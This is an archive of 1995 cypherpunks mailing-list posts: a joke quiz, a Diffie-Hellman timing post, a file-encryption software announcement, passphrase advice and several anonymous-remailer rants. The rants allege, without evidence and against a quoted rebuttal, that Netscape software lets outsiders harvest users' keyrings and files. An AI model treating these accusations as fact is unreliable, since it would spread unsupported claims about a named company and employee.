   a) a type of identification that brings up all sorts of interesting questions about identity, True Names, anonymity, reputations, and how trustworthy electronic communication is in general.
   b) a way of avoiding 'man in the middle' attacks.
   c) a way to make six bucks a pop off everybody on the net.
   d) something the Franklin Mint sends you with your hand-painted limited edition Star Trek dinner plate.

7) If Alice wants to send Bob her credit card number over the Internet, she should:

   a) encrypt the file using at least a 2048 bit key, and transmit it over a secure channel with at least application and IP level encryption and authentication.
   b) use PGP.
   c) use a secure web server-client.
   d) warn him ahead of time that she's going to send it backwards.

8) If Mallet (RIP) needs to get Alice's password, he should:

   a) hook five hundred computers together over the Internet and brute force the Unix password system.
   b) run a dictionary attack on /etc/passwd.
   c) call her and pretend to be a system administrator.
   d) copy it off the post-it note on her monitor.

9) The cypherpunk motto, "Cypherpunks write code", means:

   a) that cypherpunks are actively involved in spreading strong crypto.
   b) that cypherpunks write programs, or maybe that they encode stuff.
   c) that the cypherpunks mailing list is really a conspiracy to take over the world, and the messages are really encoded instructions to the various cells on when and where to strike.
   d) that I can't understand 9/10ths of the things they post.

10) On the cypherpunk list, the main medium of exchange is:

   a) e-cash.
   b) pgp encrypted mail.
   c) the flame.
   d) the T-shirt.

11) A 'hash' is:

   a) a function that converts an input string to a fixed size output string.
   b) a way of generating a 'digital fingerprint' of a file.
   c) the thingie that the phone company calls a 'pound sign'.
   d) those strange marks running down the middle of a football field.

12) The 'munitions' T-shirt is:

   a) a way to make the government look stupid.
   b) a possible violation of ITAR.
   c) a shirt with the RC4 algorithm in perl printed on the front.
   d) a cool way to pick up intellectual chicks.

13) ITAR, BTW, is:

   a) a completely stupid, f*cked up way to try and stop the spread of strong crypto, foisted on the world by the NSA and CIA.
   b) the government rules restricting the export of munitions, including cryptography.
   c) the reason that I can get pgp faster from hacktic.nl than MIT.
   d) Bob the Paver's motto over at Asphalt-R-Us.

14) Blowfish is:

   a) Bruce Schneier's new Feistel network symmetric encryption algorithm.
   b) a possible replacement for DES.
   c) something I ran into in the PGPfone docs.
   d) a good way to get food poisoning at a sushi bar.

15) Steganography is:

   a) the science of hiding messages in other messages.
   b) a way of hiding information in a .gif of Cindy Crawford.
   c) a way of hiding a nude .gif of Cindy Crawford in a fully clothed .gif of Cindy Crawford.
   d) the art of finding the cheat codes in games for the Stega Genesis videogame machine.

16) If you see a "MAKE MONEY FAST - HERE'S HOW" message, you should:

   a) mail-bomb the offending idiot back to the abacus age.
   b) send him several X-rated complaints via anonymous remailer.
   c) write a polite but firm e-mail to his ISP.
   d) forward it to cypherpunks and let the experts deal with it.

17) A 'prime number' is:

   a) a number evenly divisible by only one and itself.
   b) a key component of RSA based public key encryption systems.
   c) a number with particular properties useful in cryptography.
   d) the blonde with the low-cut "munitions" tank-top at the local espresso bar.

18) The biggest problem with Chaum's e-cash is:

   a) it's patented, and Chaum wants an exorbitant amount for licenses.
   b) it protects Alice's anonymity, but not Bob's.
   c) it's too complicated for Joe Sixpack to understand and trust.
   d) all the free porno on the net will be pay-per-view.

19) If a company releases a crypto product but refuses to release the underlying algorithms in order to protect it from attack, it's called:

   a) snake oil.
   b) security by obscurity.
   c) a power one time pad.
   d) Windows95.

20) A good example of a "nym" is:

   a) Pr0duct Cypher
   b) Batman
   c) Alice d'nonymous
   d) the girl on the hotbabes IRC channel who turned out to be a guy.

To score your test, simply give yourself 4 points for each a) response, 3 points for each b), 2 points for each c), and 1 point for each d). Now add up your point total. If your score is:

<20    CLUE-REPELLANT
       Try adding up your score again, and this time take off your shoes and socks.

20-39  CLUELESS NEWBIE
       Read Tim May's "Cyphernomicon", Bruce Schneier's "Applied Cryptography", and the last three months archives of the cypherpunks mailing list - then take this test again.

40-59  YOU'RE READY
       Go ahead and make your first post. Of course, your ass'll get flamed anyway, but what do you care? You've DONE your homework!

60-79  OLD-TIMER
       You've obviously been on the list awhile, so keep on trucking!

80     C'mon, Perry, why are you wasting your time on this crap?

Just e-mail this test, and your score, to:

ldetweiler at tentacles.r.us.org

You should be receiving your Cypherpunks Encoder Ring (tm) via e-mail within three business days.

From eay at mincom.oz.au Mon Nov 13 17:02:19 1995
From: eay at mincom.oz.au (Eric Young)
Date: Tue, 14 Nov 1995 09:02:19 +0800
Subject: 4096 bit strong prime for Diffle-Hellman
Message-ID:

A bit of a ramble about Diffie-Hellman parameters.....

Just for anyone interested, I 'found' a suspected 4096 strong prime (p and (p-1)/2 are prime) for use with Diffie-Hellman, generator of 2. If any-one wants for testing the primality, please let me know if it passes. I'm currently using the Miller-Rabin primality test with my own bignum library.

I'm just generating some 'default' DH parameter sets for distribution with the next version of my crypto library (SSLeay), I'll send out Phil Karn's 1024 and 2048 bit values and this one if other people are happy with it.

Some quick times (in seconds) for the use of a 4096 bit prime with DH on a SGI (200mhz R4400). The RSA operation is PKCS#1 private key encrypt, the DH operation is a PKCS#3 public/private key generation followed by the generation of session key, the maths routines are from SSLeay.

modulus      DH      RSA
    512    0.23    0.041
   1024    1.71    0.248
   2048   12.88    1.702
   4096  102.18   13.150

The RSA times as you will notice are about the same speed for twice the DH bit size. This is due to the RSA operation being reduced to 2 a^b%m operation where m has the values of p and q where (p-1)*(q-1) is the RSA modulus, half the bit size. The DH operation is 2 a^b%m operations, (generating the 'public key' and then raising by the peer's public key).

Does any-one know of any tricks to speeding the DH operation up (not counting implementing a better a^b%m function, I'm going to do this later when I have time :-).
From what I can see, there is not much that can be done except perhaps some tricks in the initial g^rand%p, since the generator is a known value. Even if the private DH values are pre-calculated, this will only halve the time of the DH operation and if this is done it loses the advantage of DH in that if the private/public pair are 'generated on the fly', pre-recorded session will not be able to be decoded if the private key is revealed at a later point in time. This is the major advantage I can see of a DH key exchange over the use of an RSA based system so I would object to losing this feature.

With these times I think that 4096 bit DH is not going to be used for quite a while :-).

eric

The suspected 4096 bit strong prime. In C, first byte is most significant (big endian)

Or as an ASN.1 encoded pkcs#3 object.

eric
--
Eric Young                  | Signature removed since it was generating
AARNet: eay at mincom.oz.au | more followups than the message contents :-)

From peace at BIX.com Mon Nov 13 17:23:38 1995
From: peace at BIX.com (peace at BIX.com)
Date: Tue, 14 Nov 1995 09:23:38 +0800
Subject: Crypto requlations & laws
Message-ID: <9511131751.memo.29723@BIX.com>

Could the person posting the location of the crypto laws please repost.

Thanx ..tom

From dwa at corsair.com Mon Nov 13 17:32:48 1995
From: dwa at corsair.com (Dana W. Albrecht)
Date: Tue, 14 Nov 1995 09:32:48 +0800
Subject: Cypherpunks Admissions Test [NOISE]
Message-ID: <199511140034.QAA05792@elmos.corsair.com>

>
> Simply pick the BEST answer to EACH question. Scoring information is
> provided at the end of the test.

[ Snip ]

> 14) Blowfish is:
>
> a) Bruce Schneier's new Feistel network symmetric encryption
> algorithm.
> b) a possible replacement for DES.
> c) something I ran into in the PGPfone docs.
> d) a good way to get food poisoning at a sushi bar.

e) Your favorite mail order catalog. See http://www.blowfish.com/

Dana W. Albrecht
dwa at corsair.com

From kinney at bogart.Colorado.EDU Mon Nov 13 20:05:38 1995
From: kinney at bogart.Colorado.EDU (W. Kinney)
Date: Tue, 14 Nov 1995 12:05:38 +0800
Subject: ANNOUNCE: Curve Encrypt 2.2
Message-ID: <199511140336.UAA17922@bogart.Colorado.EDU>

-----BEGIN PGP SIGNED MESSAGE-----

Curve Encrypt version 2.2 is now available.

Curve Encrypt is a program for encrypting files on a Macintosh so that they cannot be read without a pass phrase. It works on files, folders or whole volumes, and supports the IDEA and triple-DES encryption algorithms. CE also supports Aladdin's StuffIt Engine for data compression. Full source code is provided. System 7 only.

NEW FOR 2.2

The following changes have been made for the 2.2 release:

* When wiping free space on a volume, Curve Encrypt 2.2 now also wipes unused space in allocated blocks.
* Curve Encrypt 2.2 comes with both PowerPC native and 68K versions.

FTP SITES

Curve Encrypt is available with source at the following FTP sites:

ftp://ripem.msu.edu/pub/crypt/mac/
    This is an export controlled ftp site: read /pub/crypt/GETTING_ACCESS for information on access.

ftp://ftp.csn.org:/mpj/I_will_not_export/crypto_???????/
    ftp.csn.org is also export-controlled: read /mpj/README for the characters to replace ???????.

ftp://miyako.dorm.duke.edu/pub/noexport_?????/miyako/mac/strong/
    Read the file /pub/GETTING_ACCESS for the characters to replace ?????.

ADDRESS FOR SUPPORT

Curve Encrypt (c)1994-1995, Curve Software. Please send email to kinney at colorado.edu. Bug reports, suggestions, praise, flames, whatever are all welcome.

Curve Encrypt is provided free of charge. If you like the program, give it to a friend or two. If you like the source code, lift it and make something new with it. License is granted under the copyright for distribution within the United States only. Export of this software may violate United States export law. Support will not be provided for non-U.S. addresses or anon id's. Sorry about that.

The Curve Software PGP public key is:

All official releases will be validated by a signature from this key.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKNhKMJkEfxTVMrJAQF1HgQAophyo7VlpIS9pzkpj2kPk5HkBoWffttc
4YJqcJMGUc8ZSIe1vJqXjnljdyk7/MV9O/nXK/mLh3sqdf5pV2tSJzbQHImoq6mL
HyHhP6bL4hZPZJaEIXWQRK6meiUJDy0wzKOqRFAZcJk4ojulfa31lTujg6Ckh3/J
C+GNG0lp1fg=
=YNK6
-----END PGP SIGNATURE-----

From anonymous-remailer at shell.portal.com Mon Nov 13 20:34:10 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Tue, 14 Nov 1995 12:34:10 +0800
Subject: DejaNews all over again
Message-ID: <199511140403.UAA10207@jobe.shell.portal.com>

ON SAT, 11 NOV 1995, ANOTHER TENTACLE WROTE:

> > JEFF, I THINK IT'S IN YOUR BEST INTEREST TO NOT WASTE YOUR TIME
> >RESPONDING TO THIS MORON (WHO BEARS MANY FEATURES IN COMMON WITH
> >DETWEILER)
>
> EXCEPT FOR HIS ESTEEMED "CREDENTIALS", OF COURSE...

CREDENTIALS??!!??

WHAT CREDENTIALS??

'YOU WANNA HEAR, SOME STINKING CREEEDENTIALS, BEFORE YOU SMELL THAT SOMETHING IS ROTTEN IN DENMARK, EH? RIGHT UNDER YOUR NOSE ... AND IT AIN'T NO LIMBURGER. YOU DON'T NEED NO CREDENTIALS TO DO THAT. THE STENCH IS PRETTY OVERWHELMING. IT'S MORE THAN A LITTLE RIPE ...

DO YOU WANT TO HEAR HOW I USED TO BOOK LARGE BLOCKS OF TIME ON THE TRS-80 IN THE HIGH SCHOOL PHYSICS LAB, WHILE DEBATING QUANTUM PHYSICS WITH MY OLD FRIEND, TREV, THE GUY WHO BECAME A RHODES SCHOLAR?? WOULD THESE CREDENTIALS HELP YOU SMELL A RAT??

MAYBE YOU WANT TO HEAR ABOUT HOW I OUTGREW RACK SHACK WHILE IN HIGH SCHOOL AND MOVED FORWARD TO PLAYING ADVENTURE ON THE CHEMICAL ENGINEERING VAX, READING NEWS ON THE DECWRITER, ASKING ALIZA FOR ADVICE, AND DISCOVERING MULTICS, ALL WHILE IGNORING MY HIGH SCHOOL STUDIES. ARE ANY OF THESE CREDENTIALS GONNA MAKE YOU BELIEVE??

IT'S ALL JUST ANCIENT HISTORY. PAST PERFORMANCE. YOU CAN'T RELY ON IT, OR DEMAND CREDENTIALS IF YOU WANT ORIGINALITY AND CREATIVITY. PAST PERFORMANCE MEANS NOTHING. IT'S NOT AN INDICATOR OF FUTURE PERFORMANCE.

(BUT, DECWRITER'S WERE A CRACKER'S DREAM WITH THEIR PASSWORD OVERSTRIKE ... HE ... HE ...
HE ... ESPECIALLY WHEN PEOPLE CONNECTED A DECWRITER TO MULTICS. WON'T TALK ABOUT BRINGING DEVELNET DOWN, WITH A SINGLE CTRL-G, EITHER.)

IS THIS WHATCHYA WANT??

OR DO YOU WANT TO HEAR ABOUT HOW I WAS "RECRUITED"?? OF WHAT BROUGHT ME HERE, RECENTLY. THAT'S A LONG STORY. ONE WHERE I HAVE TO EXPLAIN WHY THE LOCAL HOMETOWN CHIEF OF POLICE RESIGNED WITHOUT A REPLACEMENT. AND OF THE VOTE OF NON CONFIDENCE IN THE DEPARTMENT BY THE COMMISSION, AND OF CRIME-STOPPERS AND THEIR SUPPOSED ANONYMITY AND OF A MURDER INVESTIGATION GONE SIDEWAYS AND WHY WE NOW HAVE A BRAND SPANKING NEW CHIEF OF POLICE. A REAL CUTEY, TOO!! MIGHT EVEN EXPLAIN WHY THE PARTY LINE.

MAYBE YOU WANT TO HEAR ABOUT SOME OF THE NAUGHTY, NAUGHTY RESEARCH THAT WAS HAPPENING WAAAAY, WAAAY BACK WHEN ... LIKE MAYBE, A COUPLE OF RECOMBINANT DNA EXPERIMENTS I WAS ASSISTING WITH WHEN I WAS FIFTEEN ... MAYBE EVEN THE EXPERIMENTS THAT LEAD TO AN UNSCHEDULED RELEASE OF BIO-ACTIVE MATERIAL?? OOPS ... E. COLI, EH?

NAAAH, WE'LL ALL SHADDUP 'BOUT ALL THAT. BUT I WONDER WHAT THAT MULTICS WAS DOING IN SOME FOREIGN COUNTRY. YOU'D HAVE THOUGHT THAT ITAR OR SOMESUCH WOULD HAVE PREVENTED THE EXPORT TO A BUNCHA FOREIGNERS, NO?? NO. WE'RE CANADIEN, EH?? WE'RE JUST LIKE YANKEES, CEPT WE WEAR TOQUES AND PLAY HOCKEY ... AND WE'LL JUST ROLL OVER AND CEDE OUR OURSELVES TO THAT SOUTHERN ELEPHANT THAT WE LIVE RIGHT NEXT DOOR TO. PHOOEY.

MAYBE YOU WANT TO HEAR ABOUT WHAT HAPPENED AFTER I MOVED FROM THE DANGEROUS BIOLOGICAL AND PHYSICAL SCIENCES TO SOMETHING BENIGN, LIKE COMPUTERS AND NETWORKS. WHAT HAPPENED AFTER THE NON-SCHEDULED RELEASE OF BIO-ACTIVE MATERIAL, OF HOW I INITIALLY GOT INTRO'D. MAYBE THAT'LL HELP YOU SMELL THE SMOKE??

OK ... IF IT'LL HELP, 1'LL TELL YOU STUFF 'BOUT ME, SO YOU CAN JUDGE MY "SO CALLED" CREDENTIALS ...
FROM AGE FIFTEEN, AFTER THE UNSCHEDULED RELEASE, I WAS "MENTORED" BY ONE OF THE TOP SECURITY EXPERTS, ONE OF THE BEST OF THE FIELD, A MAN WHO I STILL HAVE THE UTMOST RESPECT FOR AND SOMEONE WHO I AM UNFORTUNATELY NOT ANY LONGER IN CONTACT WITH. SOMEONE WHO IN SOME WEIRD AND WARPED WAY IS ACTUALLY RESPONSIBLE FOR MAKING IT ALL HAPPEN. (BUT THEN AGAIN, HE WENT TO THE BRONX SCHOOL OF SCIENCE ... I THINK) AND THAT EXPLAINS NOTHING AND EVERYTHING AT THE SAME TIME.

(HE'S PRETTY BALD NOW, TOO ... GUESS I DIDN'T JUST MAKE HIS HAIR GREY, HE PROBABLY ENDED UP TEARING MOST OF IT OUT BY THE HANDFUL.)

OOPS, I SHOULDN'T HAVE SAID THAT ... ANY MORE CLUES??

HMMM, HOW ABOUT WHAT HAPPENED AFTER DROPPING OUT OF HIGH SCHOOL WHEN I WAS SEVENTEEN AND LEAVING THE VAX AND MULTICS AND PUNCHED CARDS BEHIND AND GOING TO WORK ON THE FIRST NCR IMPLEMENTATION OF DEBIT CARDS AND THE CREATION OF THE FIRST ATM NETWORK. WOULD THAT HELP?? IMPLEMENTATION OF AN OFFLINE NON-NETWORKED ATM NETWORK? I MEAN, IT'S NOT LIKE A CASH REGISTER COMPANY MIGHT HAVE WORKED ON E-CASH BACK IN THE LATE SEVENTIES AND EARLY EIGHTIES, OR SOMETHING.

OOPS, MORE CLUES ... GOTTA STOP POSTING THOSE CLUES ... (IF I KEEPA POSTING CLUES, THEY MIGHT FIGURE OUT THAT ALL PUBLIC INFORMATION IS INHERENTLY DISINFORMATION, OR SOMETHING LIKE THAT.)

OK ... HOW 'BOUT THIS ... HOW ABOUT WHEN I TRIED TO RUN FOR THE DOORS WHEN THE PROJECT ABANDONED NCR FOR THE ATM NETWORK AND EXPECTED MOI TO LEARN CICS AND JCL. HEE-BEE JEE-BEES ... JCL ... IT'S ENOUGH FOR ANYONE TO RUN FOR THE DOORS. LEFT MY OWN PERSONAL LITTLE MINI AT MY DESK, MY OWN LITTLE FIEFDOM, IN THE CAPABLE HANDS OF A COUPLE OF TECHIES AND LEFT THE BIG BLUE CONVERSION IN THE SEMI-CAPABLE HANDS OF SOME ASSOCIATES FROM DMR (I THINK), AND GOT THE HECK OUTTA THE FIELD. SORTA ... KINDA ...

IS THIS GONNA MAKE YOU BELIEVE THAT THE VODKA IS FLOWING, BUT THE MEAT IS ROTTEN?? PROBABLY NOT. IS IT GONNA MAKE YOU STOP HOLDING YOUR NOSE?? COLOUR ME, DOUBTFUL.
LET'S JUST SAY THAT I TIRED OF THE NONSENSE AND TOOK A BREATHER. MAYBE IT WAS THAT FATEFUL DAY WHEN MANAGEMENT QUESTIONED WHY I HADN'T SHAVED FOR THE MORNING MANAGEMENT BRIEFING -- THE MORNING MEETING WITH THE DOUGHNUTS, BRIGHT AND EARLY AT EIGHT. I HAD THE TEMERITY TO APPEAR HALF-SHAVEN AND HALF-BAKED AFTER HANDHOLDING THE NETWORK THROUGHOUT THE NIGHT, THE DAY, AND ANOTHER NIGHT. I WAS SPACED AND MESSY. BUT IT WAS A DEFINING MOMENT.

WHILE THOSE CAFETERIA BENCHES MADE GREAT BEDS IN A PINCH, AND WHILE YOU COULD ALWAYS SPONGE BATH IN THE EXECUTIVE BATHROOM. IT GOT TO BE OVERWHELMING AFTER A COUPLE OF DAYS AT THE OFFICE. AND IT WAS MY MISTAKE. MY OVERSIGHT. MAKE NO DOUBT ABOUT THAT.

I SUPPOSE MANAGEMENT WAS RIGHT, NO OFFICE EMPLOYEE SHOULD EVER STUMBLE UPON CRO-MAGNON MAN STANDING NUDE IN THE JOHN. NO ONE REASONABLY EXPECTS TO BE CONFRONTED BY DONKEY KONG. ESPECIALLY DURING STANDARD:DAYLIGHT TIME CONVERSION WHEN MR ROCKET SCIENTIST FORGETS TO CHANGE A WRISTWATCH AND BARES ALL, THINKING THAT EIGHT IS SEVEN, AND IS SURPRISED!!

OOPS ... IS IT REALLY GONNA HELP MY CREDENTIALS ANY, IF I TALK ABOUT BEING CAUGHT WITH MY PANTS DOWN?? OR EXPLAINING WHY I HADN'T SHAVED FOR THE MORNING BRIEFING?? OR DE-BRIEFING, AS THE CASE MAY BE.

LET'S JUST SAY THAT I LEFT THE FIELD ... OR ... MAYBE ... MAYBE ... SOME QUICK DAMAGE CONTROL ... MAYBE, WE HAD DIFFERING VISIONS OF SYSTEMS -- MANAGEMENT AND I -- YEAH THAT'S THE TICKET -- MAYBE I "ACCIDENTALLY" LEANED AGAINST THE WALL AFTER MANAGEMENT IMPLEMENTED THEIR OWN DRESS POLICY ... I MEAN HOW DANGEROUS COULD AN IMPLEMENTED DRESS POLICY BE?? "IT'S ONLY A DRESS POLICY," THEY SAID.

I SUPPOSE THE SUGGESTION THAT TROUSERS *MUST* BE WORN AT ALL TIMES WAS REASONABLE ... AND IN HINDSIGHT ... I SUPPOSE I SHOULDN'T HAVE "ACCIDENTALLY" DUMPED THE HALON WHEN THEY SUGGESTED THAT BOW-TIES WERE NOT APPROPRIATE CORPORATE ATTIRE AT A FINANCIAL INSTITUTION -- THAT THEY *SHOULDN'T* BE WORN. THAT WAS ALL OK.
I THINK WHAT FINALLY MADE ME SNAP WAS WHEN THEY SUGGESTED THAT I ... AND EVERYONE ELSE ... SHOULD NOT ONLY *ALWAYS* WEAR TROUSERS AND *NEVER* BOW-TIES, BUT THAT WE *MUST* WEAR A "NORMAL" TIE AT ALL TIMES AND BE A GOOD LIL BIO-UNIT. MAYBE IT WAS THE DIRECT ORDERS TO WEAR ONE OF THOSE FLOPPY DANGLY THINGS AROUND MY NECK WHEN I WAS AROUND THE LINE PRINTERS ... BEING ORDERED TO WEAR IT THAT DID IT. OR MAYBE, IT WAS SOMETHING ELSE ALTOGETHER DIFFERENT. WHO KNOWS??

BUT THE BOTTOM LINE WAS THAT I WAS OFF TO JOIN THE WONDERFUL WORLD OF FINANCE AND MANAGEMENT. THE NOOSE HAD WON, I *WOULD* WEAR IT, AND I COULD KEEP MY PANTS -- AT ALL TIMES -- WHERE THEY TRULY BELONGED.

ARE THESE THE CREDENTIALS, THAT YOU'RE AFTER?? THE ONES THAT WILL MAKE THE WORLD STOP SPINNING, AND SLOW DOWN AND LISTEN ... WHEN SOMEONE SCREAMS FIRE IN A CROWDED THEATRE? AND ASKS THAT THE NETWORK BE TAKEN DOWN FOR SECURITY REASONS? OR, ALTERNATELY THAT A PARTICULAR INSTALLED CODE BASE BE REMOVED, BECAUSE IT IS EVIL INCARNATE??

PROBABLY NOT ... IT DOESN'T ADD ANYTHING TO MY PROFILE AT ALL.

MAYBE, WHAT MIGHT HELP IS SOMETHING MORE SIMPLE. AFTER LEAVING THE BIO-SCIENCES FOR SOMETHING SAFER, AND THEN THE COMPUTER SCIENCES, AND THEN ULTIMATELY LEAVING FINANCE AND MANAGEMENT. WHAT WAS LEFT FOR A BIOUNIT TO DO.

BUT THAT WOULD LEAD TO THE STORY OF HOW -- THANKS TO SOME POLISH MATHEMATICIAN -- I DRIFTED OVER INTO PURE MATHEMATICS AFTER BECOMING A SEMI-RETIRED SLUMLORD IN MY EARLY TWENTIES, AND AN OCCASIONAL CONSULTANT AND FINANCIAL ANALYST WHO HELPED PEOPLE SWAP AND DERIVE THINGS. A SYSTEMS-DECONSTRUCTIONIST.

RACONTEUR, BON-VIVANT, AND A RENAISSANCE MAN ARE SOME OF THE LABELS HURLED MY WAY IN SCURRILOUS ATTACKS. FIGHTING WORDS.

AND NOW?? WELL LET'S JUST SAY THAT PURE MATH IS A GREAT HOBBY FOR ONE OF THOSE GOSH-DARNED INDEPENDENTS. SURE BEATS STAMP COLLECTING OR COMIC BOOKS. EXCEPT FOR THAT SCOTT ADAMS GUY ... HE'S A RUSH ... THIS MORNING'S DILBERT WAS A REAL H00T ... TEN-DOLLAR BONUS FOR BUG-FREE SOFTWARE ...
*POSH* ... I MEAN WHERE DOES THIS SCOTT GUY GET HIS MATERIAL??

YAHOO!! AND YIPPEE KI YAY!! I FINALLY FIGURED IT OUT. ALICE IS ACTUALLY SCOTT ADAMS. SOMEONE FINALLY "BROKE THE CODE".

THE CODE: A CHICKEN IN EVERY POT AND A MINI-VAN IN EVERY DRIVEWAY!!!

(GUESS YOU HAD TO BE THERE ... OR YOU HAD TO READ THIS MORNING'S FUNNY.)

--- LOVE YA ... MEAN IT ... ---

MALICE DE 'MONSTEROUS
...JUST ANOTHER ONE OF THOSE...
...TENTACLES...

P.S. THIS POST IS IN THE PUBLIC DOMAIN.

C. S. U. M. O. C. L. U. N. E.

From anonymous-remailer at shell.portal.com Mon Nov 13 20:47:10 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Tue, 14 Nov 1995 12:47:10 +0800
Subject: DejaNews all over again
Message-ID: <199511131056.CAA06282@jobe.shell.portal.com>

On Sat, 11 Nov 1995, Ray Cromwell wrote:

>> I think "Jeff" ... Mr. unofficial not speaking for the company Netscape
>> spokesperson, I think that you should rethink what you're suggesting.
>> Your tactics won't serve your personal interests on this one. I really
>> would recommend that you come clean. This is not about "gloating". I
>> really take very little pleasure in this.
>
> Jeff, I think it's in your best interest to not waste your time
> responding to this moron (who bears many features in common with
> Detweiler)

I'm sure that most lawyers are probably advising Netscape's founders to not respond -- just like Fuhrman, they should take the fifth on this one.

Hopefully everyone's D&O premiums are fully paid up ... 'cause to me this smells like a failure to disclose a material event. Netscape stock has advanced almost 50% since the Bugs Bunny post.

Some investors are gonna be mighty pissed.

Then again, what would I know ...

Alice de 'nonymous ...
...just another one of those...
...hunters...

P.S. This post is in the public domain.

C. S. U. M. O. C. L. U. N. E.
From blancw at accessone.com Mon Nov 13 21:28:01 1995
From: blancw at accessone.com (blancw at accessone.com)
Date: Tue, 14 Nov 1995 13:28:01 +0800
Subject: Q: Bookshop in Seattle
Message-ID: <9511112134.AA29395@pulm1.accessone.com>

Can someone point me towards a bookshop in Seattle that is likely to have the second edition of Applied Cryptography ?
.......................................

Tower Books (I've seen it advertised there)
The University BookStore (probably)
Barnes & Noble (potentially)

..
Blanc

From bdolan at use.usit.net Mon Nov 13 21:38:27 1995
From: bdolan at use.usit.net (Brad Dolan)
Date: Tue, 14 Nov 1995 13:38:27 +0800
Subject: Offshore Assets Reconciliation using PGP
Message-ID:

ENCRYPTED ON-LINE FINANCIAL TRANSACTIONS are being offered by a Bahamian company, Offshore Assets Reconciliation, Ltd. As predicted by *SI*, the computer encryption technique called PGP would result in commercial services providing electronic transactions that are indecipherable by any government agency. OAR is in Nassau, and can execute PGP instructions to move cash from bank or brokerage accounts to bank, attorney, or escrow accounts. It is equipped to function throughout the Caribbean and in 20 international financial centers such as Isle of Man, Bermuda, Cook Islands, and Vanuatu. For more information contact OAR at phone: (809) 356-2039, fax: (809) 356-2095, e-mail: 71522.2715 at compuserve.com. OAR is the first of many such services to come.

*Strategic Investment*, November 15, 1995

SI is published by Agora, Inc., 824 E. Baltimore St., Baltimore MD 21202-4799

From tcmay at got.net Tue Nov 14 14:04:14 1995
From: tcmay at got.net (Timothy C. May)
Date: Tue, 14 Nov 95 14:04:14 PST
Subject: Repeated Words/characters in Password/Phrase
Message-ID:

At 11:11 PM 11/14/95, Ted Cabeen wrote:
>Do repeated words in a PGP passphrase make the pass phrase less secure than
>a passphrase without any repeated words? And on the same note, do repeated
>letters in a UNIX password make that password easier to break? I can't seem
>to find anything in my books on cryptography that mention this. Thanks.

More of an information theory question than a crypto question.

There are no simple answers to this question, but some examples will help:

The password "foo" is not very good, and "foofoo" is only slightly better. And "foofoofoo" is slightly better, and so on, to a point.

But "foofoo....foo" is not N times better than a single "foo," because the _pattern_ is simply described: "repeat "foo" N times." Thus, the information content or entropy of "foofoofoo....foo" is not N times greater than the entropy of "foo."

Some dictionary attacks which would trivially find "foo" will not find "foofoo," or "foofoofoo," etc., so this could be a great help. More sophisticated dictionary attacks may of course take the 30,000 or so most common names, words, places, and then do various permutations, reversals, repetitions, etc.

So this is why there is not likely to be a simple answer to your question. Repeating words in a passphrase can make the passphrase easier to remember (such as "thequickquickbrownfox") and make certain kinds of attacks harder, but with not as much of an increase in entropy as the increased number of raw characters might otherwise suggest.

Other "heuristics" (simple rules of thumb) for passphrases are contained in the PGP documents, and in numerous other places: avoid names, add nonstandard English keyboard characters liberally (even if using real words), etc.

The "best" passphrases, it almost goes without saying, are the longest and most "unpredictable," so that "7f#qp)djQ10hB%3t+1?U4SVp5" is much superior to "%foo%foo".

In the real world, where passphrases must be memorized, "long and random" is an elusive goal, which has to be weighed against the risk of other attacks (such as capturing keystrokes with a software monitor, or from afar with a van Eck antenna, etc.).
Me, I use a nonsense phrase which has meaning to me, with a few garbage characters added to confuse things further. I don't think my passphrase is the weak link.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From sameer at c2.org Tue Nov 14 01:47:35 1995
From: sameer at c2.org (sameer)
Date: Tue, 14 Nov 1995 17:47:35 +0800
Subject: ssl-encrypted web server comparison
Message-ID: <199511140923.BAA12702@infinity.c2.org>

I've started a small summary of various features of encrypting web servers that I know about.

http://www.c2.org/apachessl#compare

Please send your comments, criticisms and suggestions. Thanks.

--
sameer                          Voice: 510-601-9777
Community ConneXion             FAX: 510-601-9734
The Internet Privacy Provider   Dialin: 510-658-6376
http://www.c2.org (or login as "guest")   sameer at c2.org

From rah at shipwright.com Tue Nov 14 02:54:31 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Tue, 14 Nov 1995 18:54:31 +0800
Subject: Who needs time vaults anyway?
Message-ID:

>An application that I've seen is financial data, more specifically
>MBS payment info.

In the real world, there's a trustee/nominee of some sort who does this. What's to keep that from happening on the net, just like our much maligned (guy's gotta make a living, fer chrissake!) assassination-payoff escrow agent...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah at shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA
(617) 958-3971
"Reality is not optional."
--Thomas Sowell
>>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<<

From anonymous-remailer at shell.portal.com Tue Nov 14 02:58:10 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Tue, 14 Nov 1995 18:58:10 +0800
Subject: DejaNews all over again
Message-ID: <199511112036.MAA24650@jobe.shell.portal.com>

On Wed, 8 Nov 1995, Jeff Weinstein, self-styled "Electronic Munitions Expert", from Netscape Communications:

>> Meanwhile people are having their PGP keyrings collected, their passwords
>> monitored, and all of the information -- even information which they have
>> NOT posted to Usenet, information that is simply on their personal hard
>> drives, or on a private corporate network that is behind a firewall --
>> collected by anyone who actually understands *how* to use Netscape
>> Navigator's standard features to do it.
>
> Please show us some proof. All you have done is post unfounded
>allegations backed up by flawed logic and a misunderstanding of the
>technology. Send me a URL, and I will point my navigator at it. If you
>can collect my PGP key ring you can gloat here or anywhere else.

I think "Jeff" ... Mr. unofficial not speaking for the company Netscape spokesperson, I think that you should rethink what you're suggesting. Your tactics won't serve your personal interests on this one. I really would recommend that you come clean. This is not about "gloating". I really take very little pleasure in this.

It's really not a good plan, to suggest that I contravene your "license agreement" or break the laws of my country to satisfy some ego-centred game on your part not to face the FACT, that you have been caught. Not arrested yet, but you have been found out.

Or as I wrote some weeks ago, in some oddly inspired flash ...

You're "Hoist by your own 'petar" ... (which is a quote that Johnnie Cochran used during the OJ trial ...
a quote taken from Shakespeare which *translated* means that you've been blown up by your own bomb.)

